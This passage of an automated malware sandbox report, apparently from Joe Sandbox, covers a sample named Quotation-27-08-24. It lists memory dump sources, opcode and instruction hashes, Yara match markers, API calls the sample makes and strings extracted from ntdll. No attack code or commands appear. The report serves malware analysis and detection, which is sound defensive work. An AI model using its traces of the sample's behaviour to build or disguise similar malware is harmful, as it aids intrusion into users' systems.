                                          • Instruction ID: da2884ede46040e9603a91e7b26828c0ffc469a20217f58343ee3dae4ca9acc9
                                          • Opcode Fuzzy Hash: b23050ff8ff1e65bb856c35ead67b2c4bdf8801f1595c28be6800a5c80fa0586
                                          • Instruction Fuzzy Hash: B2513DB4E002598FDB14DFA9C5806AEFBF2FF89304F248269D508A7315D731A942CFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e59d765c4e8a10ecf75d5d1159b78cd201ac5ffe05f73f0b698b58e7d8972a8f
                                          • Instruction ID: 4a04d4400da716992112fe6cc7b1260aa97dc8de5ea466528d86aa540b8d1fd7
                                          • Opcode Fuzzy Hash: e59d765c4e8a10ecf75d5d1159b78cd201ac5ffe05f73f0b698b58e7d8972a8f
                                          • Instruction Fuzzy Hash: 2B514DB5E002598FDB14CFA9C5815AEFBF2FF89304F248269D418A7315D7319942CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2624d1252c7a044b0b4d88e41c4aa6df0fe371969d4216c3deb4c47def48972e
                                          • Instruction ID: 0b1edd38da81595187344b903ee52e7cac68ebc42521c3329e3da1ae68fbc6a4
                                          • Opcode Fuzzy Hash: 2624d1252c7a044b0b4d88e41c4aa6df0fe371969d4216c3deb4c47def48972e
                                          • Instruction Fuzzy Hash: 2541B431F14119DBDB18CEA9D9814FEBBFBEF88310B10652AD605EBA51D672CD01C791

                                          Execution Graph

                                          Execution Coverage:1.2%
                                          Dynamic/Decrypted Code Coverage:5.2%
                                          Signature Coverage:8.1%
                                          Total number of Nodes:135
                                          Total number of Limit Nodes:10

                                          Control-flow Graph

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175F5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 0d697ff97b7bf7ef080c10395bac8f7f97858c555f2fc09287bfaac7e5fb147e
                                          • Instruction ID: b50bd6731deed96e950b08a0aa8feab8488cbe6f506688fedb54eada03f9b3f3
                                          • Opcode Fuzzy Hash: 0d697ff97b7bf7ef080c10395bac8f7f97858c555f2fc09287bfaac7e5fb147e
                                          • Instruction Fuzzy Hash: F60171B5E0020DBBDF10DBE5DD42FDEB7789B14308F4081AAE90897241F635EB488BA5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 203 42c443-42c47c call 404ad3 call 42d683 NtClose
                                          APIs
                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C477
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 087d854117f242ca877c517a827cee7a74cf93268eeac0a7a33afdcf45fba969
                                          • Instruction ID: 51114d8caf44d8c8ec11044850fe6d8fdd2803b96a5a8929edc6ca14ef13830b
                                          • Opcode Fuzzy Hash: 087d854117f242ca877c517a827cee7a74cf93268eeac0a7a33afdcf45fba969
                                          • Instruction Fuzzy Hash: D1E086756002147BC610EB5ADC01FD7B79DDFC5754F00841AFA08A7141CA70791087F4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 217 fa2b60-fa2b6c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: da4f0c0c48aaf92bd89fb117e7b18152bd100f391a33d8b7fac8db75b6099644
                                          • Instruction ID: 778b7ceb9fd645a1aa591e683abfe89eff6a0bbfc408362a0183e6bc92bd035e
                                          • Opcode Fuzzy Hash: da4f0c0c48aaf92bd89fb117e7b18152bd100f391a33d8b7fac8db75b6099644
                                          • Instruction Fuzzy Hash: C590026120240013420571598814656400E87E0341B55C032E10155D0EC9298992B925

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 218 fa2c70-fa2c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0bda2e9ddc2be9dbd378e8f14e1dd7c1bb03bd83e87eae9762e1df4c6395dc88
                                          • Instruction ID: 8af42a157bced598b53946c69341dcbfe877e9aaa065210cc6926d1ba234737a
                                          • Opcode Fuzzy Hash: 0bda2e9ddc2be9dbd378e8f14e1dd7c1bb03bd83e87eae9762e1df4c6395dc88
                                          • Instruction Fuzzy Hash: 1A90023120148812D2107159C80478A000D87D0341F59C422A4425698E8A998992B921

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 219 fa2df0-fa2dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7cd76b7972a0dcaf54c09d97b7a1a5ca2bc2ebcc9f12bea7c2f2a9bec237c493
                                          • Instruction ID: 9517d00eab424d98d8442838862014c51fc2a734ac2b24bdb3d10d9f15128336
                                          • Opcode Fuzzy Hash: 7cd76b7972a0dcaf54c09d97b7a1a5ca2bc2ebcc9f12bea7c2f2a9bec237c493
                                          • Instruction Fuzzy Hash: 7290023120140423D21171598904747000D87D0381F95C423A0425598E9A5A8A53F921

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 220 fa35c0-fa35cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7452d8bc660806c42174e3745beb7fd4d8fd05f950eb90e498531353c9e28b6d
                                          • Instruction ID: 68e663891a30bffe9fd1c570e1488b62b4574376199ce01a593b97010f99aa48
                                          • Opcode Fuzzy Hash: 7452d8bc660806c42174e3745beb7fd4d8fd05f950eb90e498531353c9e28b6d
                                          • Instruction Fuzzy Hash: FF90023160550412D20071598914746100D87D0341F65C422A04255A8E8B998A52BDA2

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(Z426iIL7,00000111,00000000,00000000), ref: 00413E3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: Z426iIL7$Z426iIL7
                                          • API String ID: 1836367815-738817621
                                          • Opcode ID: 30b693517c8c9454ad460155bc8a2683d0b8e65c534fb3cab12401e0dbaecb32
                                          • Instruction ID: e26a7590a9c3392bd6a581aed72e26fd541f9dbc59b2ba068317312168064fe5
                                          • Opcode Fuzzy Hash: 30b693517c8c9454ad460155bc8a2683d0b8e65c534fb3cab12401e0dbaecb32
                                          • Instruction Fuzzy Hash: B01106B1D00218BADB01EAD6DC81DEF7B7CEF41794F01846AFA04B7101D6395E068BA5

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(Z426iIL7,00000111,00000000,00000000), ref: 00413E3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: Z426iIL7$Z426iIL7
                                          • API String ID: 1836367815-738817621
                                          • Opcode ID: af9fe4e435e036b25b87145d93346286f261203749c1d65ef3814556e14f3d77
                                          • Instruction ID: d04008e4784f11087ef15b32645ef078d98fcd74c293245749b5fb37f6a58a81
                                          • Opcode Fuzzy Hash: af9fe4e435e036b25b87145d93346286f261203749c1d65ef3814556e14f3d77
                                          • Instruction Fuzzy Hash: 09010871D0021CBADB01AAE29C81DEF7B7CDF41694F018069FA04B7141D5784F0647A5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 193 42c763-42c7a4 call 404ad3 call 42d683 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(?,0041E38B,?,?,00000000,?,0041E38B,?,?,?), ref: 0042C79F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: eeb72f86ac1694eb338319ebebae05c5e7828ef32382e1dfcef9ea1218520902
                                          • Instruction ID: 94a79bd46b80dca6f3ef207c4e0b6efedf9d64307858bdde659ee4340e19f54e
                                          • Opcode Fuzzy Hash: eeb72f86ac1694eb338319ebebae05c5e7828ef32382e1dfcef9ea1218520902
                                          • Instruction Fuzzy Hash: 2CE06DB5200604BFCA10EE59DC41FDB73ADEFC9710F004019FA08A7241D670B9118BF9

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 198 42c7b3-42c7f7 call 404ad3 call 42d683 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03CA3305,00000007,00000000,00000004,00000000,00416E0B,000000F4), ref: 0042C7F2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 29c83403bbd505ee5ec20a26071bfde9c7c0d50249bc95c8e6454c34dea3c249
                                          • Instruction ID: 795ca56e5001b1277c8131f72f1244a574ba4bdecb785e2ee2652dbee9fdeed6
                                          • Opcode Fuzzy Hash: 29c83403bbd505ee5ec20a26071bfde9c7c0d50249bc95c8e6454c34dea3c249
                                          • Instruction Fuzzy Hash: DEE06D72200204BBCA10EE59DC41EDB77ADEFC4710F00401AF908A7241DAB0B9108BB8

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 208 42c803-42c83f call 404ad3 call 42d683 ExitProcess
                                          APIs
                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,9A5EABA1,?,?,9A5EABA1), ref: 0042C83A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 7c2f093264db18501a861cffe165594b1c34217695bf41b587e047210b58ea4f
                                          • Instruction ID: 9e42fe514e40327288c5df8bd2f445a3cc6b8d722534ec446af54a7f9c2cf752
                                          • Opcode Fuzzy Hash: 7c2f093264db18501a861cffe165594b1c34217695bf41b587e047210b58ea4f
                                          • Instruction Fuzzy Hash: 97E046722402147BC620EB5ADC02F9BB76DDBC5718F00406AFA09A7242CBB4B91087F8

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 213 fa2c0a-fa2c0f 214 fa2c1f-fa2c26 LdrInitializeThunk 213->214 215 fa2c11-fa2c18 213->215
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8858fe62f8f4be6ce78cc6cdc08400da8445066f395528a0640666d87d729efe
                                          • Instruction ID: 90170a90549b85eb1ae09ca98a9ab9a5d2430bd9b7a23c6b82b662d040512e8a
                                          • Opcode Fuzzy Hash: 8858fe62f8f4be6ce78cc6cdc08400da8445066f395528a0640666d87d729efe
                                          • Instruction Fuzzy Hash: E3B09B71D015C5D5DB51E7644A0871B79046BD1761F15C072D2030681F473CC5D1F575
                                          Strings
                                          • The instruction at %p tried to %s , xrefs: 01018F66
                                          • This failed because of error %Ix., xrefs: 01018EF6
                                          • *** enter .cxr %p for the context, xrefs: 01018FBD
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01018E3F
                                          • *** then kb to get the faulting stack, xrefs: 01018FCC
                                          • The resource is owned exclusively by thread %p, xrefs: 01018E24
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01018F3F
                                          • <unknown>, xrefs: 01018D2E, 01018D81, 01018E00, 01018E49, 01018EC7, 01018F3E
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01018FEF
                                          • read from, xrefs: 01018F5D, 01018F62
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01018E02
                                          • The instruction at %p referenced memory at %p., xrefs: 01018EE2
                                          • a NULL pointer, xrefs: 01018F90
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01018DD3
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01018E86
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01018D8C
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01018DA3
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01018E4B
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01018DB5
                                          • The resource is owned shared by %d threads, xrefs: 01018E2E
                                          • Go determine why that thread has not released the critical section., xrefs: 01018E75
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01018F26
                                          • write to, xrefs: 01018F56
                                          • *** Inpage error in %ws:%s, xrefs: 01018EC8
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01018F2D
                                          • an invalid address, %p, xrefs: 01018F7F
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01018F34
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01018DC4
                                          • The critical section is owned by thread %p., xrefs: 01018E69
                                          • *** enter .exr %p for the exception record, xrefs: 01018FA1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • API String ID: 0-108210295
                                          • Opcode ID: efc208f555758b737bdbc4139df86d30108d2bd55b66667aa358c935daf18d02
                                          • Instruction ID: 6ecfa8817e809bc87dc25542070e172d05511d69914643b079ec0943fe5ad3f6
                                          • Opcode Fuzzy Hash: efc208f555758b737bdbc4139df86d30108d2bd55b66667aa358c935daf18d02
                                          • Instruction Fuzzy Hash: 38816935A00200BFDB169B19CC4AE6F3FB5EF86B55F004099FB046F166E379C615EA62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          • Opcode ID: 84f23d41cf2f637790b24a4267bd6425707bb0a92871f18b514c3c316a17460a
                                          • Instruction ID: b95be93d025998fae8c0ad9ecf7cd0cd8fa6ca5dffedfee5c1da7641326353e9
                                          • Opcode Fuzzy Hash: 84f23d41cf2f637790b24a4267bd6425707bb0a92871f18b514c3c316a17460a
                                          • Instruction Fuzzy Hash: 5292C071A04381AFE760CF25CC85B6BB7E8BB84720F04492DFA94D7291E774E944EB52
                                          Strings
                                          • double initialized or corrupted critical section, xrefs: 00FD5508
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 00FD5543
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FD540A, 00FD5496, 00FD5519
                                          • corrupted critical section, xrefs: 00FD54C2
                                          • Address of the debug info found in the active list., xrefs: 00FD54AE, 00FD54FA
                                          • Thread identifier, xrefs: 00FD553A
                                          • Critical section debug info address, xrefs: 00FD541F, 00FD552E
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FD54CE
                                          • undeleted critical section in freed memory, xrefs: 00FD542B
                                          • 8, xrefs: 00FD52E3
                                          • Invalid debug info address of this critical section, xrefs: 00FD54B6
                                          • Critical section address, xrefs: 00FD5425, 00FD54BC, 00FD5534
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FD54E2
                                          • Critical section address., xrefs: 00FD5502
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • API String ID: 0-2368682639
                                          • Opcode ID: b36e04a27e4482893ce9c618b8de56fc1edbb8453218f896b0643e2aaa06719c
                                          • Instruction ID: eaeb93d6a9f5f94a82a86f983cac74755a115df821821a5bf751bbb3be9b6aaf
                                          • Opcode Fuzzy Hash: b36e04a27e4482893ce9c618b8de56fc1edbb8453218f896b0643e2aaa06719c
                                          • Instruction Fuzzy Hash: 4F81AEB1E00748EFDB20CF94C841BAEBBB6BB08B54F24411AF905BB280D775AD45EB51
                                          Strings
                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 00FD261F
                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00FD2624
                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00FD25EB
                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00FD2409
                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00FD2412
                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00FD22E4
                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00FD24C0
                                          • @, xrefs: 00FD259B
                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00FD2602
                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00FD2506
                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00FD2498
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • API String ID: 0-4009184096
                                          • Opcode ID: fc887e4cde7d23e287c81e72c6c80cc79eb646667ef3339086dff3e7115a1a23
                                          • Instruction ID: 690dca118aabf242a576773ee8486752485482800321df4d9531ea96e17ae99f
                                          • Opcode Fuzzy Hash: fc887e4cde7d23e287c81e72c6c80cc79eb646667ef3339086dff3e7115a1a23
                                          • Instruction Fuzzy Hash: 8B0272F2D002289BEF61DB14CC81BDDB7B8AF55314F0441DAAA09A7241DB749F84EF99
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                          • API String ID: 0-2515994595
                                          • Opcode ID: 53579b43033335fc858399071e7abba2f4d371ebf3af620d14b35b61c1fcc54d
                                          • Instruction ID: f56ae4bac3671efd5e5a553f19d3fba44cd54f647389f07320e12207885c0097
                                          • Opcode Fuzzy Hash: 53579b43033335fc858399071e7abba2f4d371ebf3af620d14b35b61c1fcc54d
                                          • Instruction Fuzzy Hash: D451C4B19083059BE736EF188849BABBBE8FF84350F148A5FF99583181E770D504D792
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          • Opcode ID: b486a415281ca1089b9b270edf9f4c70a8f76e236f29c687390c00a09af44c63
                                          • Instruction ID: 2ed4fd44619a60e12790c0e9143987238edb53be23f0fdd3dcb156dd5bc09dd8
                                          • Opcode Fuzzy Hash: b486a415281ca1089b9b270edf9f4c70a8f76e236f29c687390c00a09af44c63
                                          • Instruction Fuzzy Hash: E9D1CB31600685DFDB22DF68C841AAEBBF1FF4A710F088099F9C59B65AD739D984DB10
                                          Strings
                                          • HandleTraces, xrefs: 00FE8C8F
                                          • VerifierDlls, xrefs: 00FE8CBD
                                          • AVRF: -*- final list of providers -*- , xrefs: 00FE8B8F
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00FE8A67
                                          • VerifierDebug, xrefs: 00FE8CA5
                                          • VerifierFlags, xrefs: 00FE8C50
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00FE8A3D
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
                                          • Opcode ID: 4cce14ba025b015a588df9da22047f25a271ed441e567995fe89ac6b23bb0ef0
                                          • Instruction ID: cb6208a096968d032ac4d7d20576f4d89e5ace865e0f7d7164a4d6d4273b7bcb
                                          • Opcode Fuzzy Hash: 4cce14ba025b015a588df9da22047f25a271ed441e567995fe89ac6b23bb0ef0
                                          • Instruction Fuzzy Hash: D9916D72645791EFD721FF29CC81B1B77A5EB85790F140418F9896B281CB78EC02E7A2
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                          • API String ID: 0-1109411897
                                          • Opcode ID: b464d40c78abd3c57a0342d66c9a44ec83d22986d84b23dd60f818d4a5f04747
                                          • Instruction ID: 6cd08eabd05ee06bc649be3acfebfff168333eab10c38c33c0db9faeeba40b76
                                          • Opcode Fuzzy Hash: b464d40c78abd3c57a0342d66c9a44ec83d22986d84b23dd60f818d4a5f04747
                                          • Instruction Fuzzy Hash: 0FA26C75E0562ACFDB64CF14CD99BA9B7B1AF45310F2442E9D80DA7290DB31AE85EF00
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: 889d8511e72dec88a52a5e71a1e4e6d6762e9264bbdec56283a69ddd13c42fe7
                                          • Instruction ID: 3801119917bf616ba2692abff4a2a3b716c0cf408c9790729238fc667c31a641
                                          • Opcode Fuzzy Hash: 889d8511e72dec88a52a5e71a1e4e6d6762e9264bbdec56283a69ddd13c42fe7
                                          • Instruction Fuzzy Hash: 51913771E003159BEB35DF58DC46BAA7BA1BB41B24F18012AF940AB3C1D779AC41FB91
                                          Strings
                                          • \WinSxS\, xrefs: 00F92E23
                                          • .Local\, xrefs: 00F92D91
                                          • @, xrefs: 00F92E4D
                                          • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 00FD279C
                                          • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 00FD276F
                                          • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 00FD2706
                                          Similarity
                                          • API ID:
                                          • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                          • API String ID: 0-3926108909
                                          • Opcode ID: eb4352f656fe3165fbf7a52ccf818874834846abe333b180991887b06b1566ac
                                          • Instruction ID: ae7138f935ea9fa319ab32e2c85c9fc9bff495c973d5e9ac347265cfd3fefbc3
                                          • Opcode Fuzzy Hash: eb4352f656fe3165fbf7a52ccf818874834846abe333b180991887b06b1566ac
                                          • Instruction Fuzzy Hash: 5781BDB1504341AFEB61CF18C890A6BB7E5AF95710F04895EF884CB352D774DA44EBE2
                                          Strings
                                          • Getting the shim user exports failed with status 0x%08lx, xrefs: 00FB9A01
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FB9A11, 00FB9A3A
                                          • apphelp.dll, xrefs: 00F56496
                                          • Loading the shim user DLL failed with status 0x%08lx, xrefs: 00FB9A2A
                                          • LdrpInitShimEngine, xrefs: 00FB99F4, 00FB9A07, 00FB9A30
                                          • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 00FB99ED
                                          Similarity
                                          • API ID:
                                          • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-204845295
                                          • Opcode ID: 1626673a0827db2d76281725bae6d4f620c1c1343625d73e3b2d621918ed8749
                                          • Instruction ID: d97340d517761305aaece9c519cde6963be2a114fb42a63602f2d0a4a0f1fe54
                                          • Opcode Fuzzy Hash: 1626673a0827db2d76281725bae6d4f620c1c1343625d73e3b2d621918ed8749
                                          • Instruction Fuzzy Hash: 1051E1716483049FD320EF24CC42BAB7BE8FB84754F40491AFA959B191D778E904EB93
                                          Strings
                                          • LdrpInitializeImportRedirection, xrefs: 00FD8177, 00FD81EB
                                          • LdrpInitializeProcess, xrefs: 00F9C6C4
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F9C6C3
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 00FD8181, 00FD81F5
